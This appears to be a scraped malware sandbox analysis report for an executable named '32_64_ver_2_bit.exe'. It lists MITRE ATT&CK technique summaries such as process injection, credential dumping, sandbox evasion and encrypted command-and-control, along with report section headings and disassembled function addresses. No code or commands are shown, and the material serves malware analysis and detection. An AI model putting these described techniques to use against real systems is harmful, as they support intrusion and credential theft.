Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 32_64_ver_2_bit.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00406128, Relevance: 193.6, APIs: 70, Strings: 40, Instructions: 1139
windowCOMMONCrypto

Function 004029DA, Relevance: 21.3, APIs: 14, Instructions: 294
COMMON

Function 004044EA, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Function 00409A19, Relevance: 4.6, APIs: 3, Instructions: 59
fileCOMMON

Function 00402446, Relevance: 3.0, APIs: 2, Instructions: 41
windowCOMMON

Function 0040206F, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 242
COMMON

Function 004193AF, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Function 00402D99, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230
COMMON

Function 0040391C, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
timewindowCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre